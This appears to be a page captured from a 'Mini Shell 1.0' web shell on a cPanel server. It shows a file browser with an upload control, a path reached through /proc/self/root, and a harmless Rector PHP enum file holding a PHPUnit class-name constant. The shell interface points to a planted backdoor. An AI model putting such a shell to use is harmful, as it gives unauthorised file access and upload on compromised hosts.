HOME


Mini Shell 1.0
DIR: /proc/self/root/opt/cpanel/ea-wappspector/vendor/rector/rector/src/Enum/
Upload File :
Current File : //proc/self/root/opt/cpanel/ea-wappspector/vendor/rector/rector/src/Enum/ClassName.php
<?php

declare (strict_types=1);
namespace Rector\Enum;

final class ClassName
{
    /**
     * @var string
     */
    public const TEST_CASE_CLASS = 'PHPUnit\\Framework\\TestCase';
}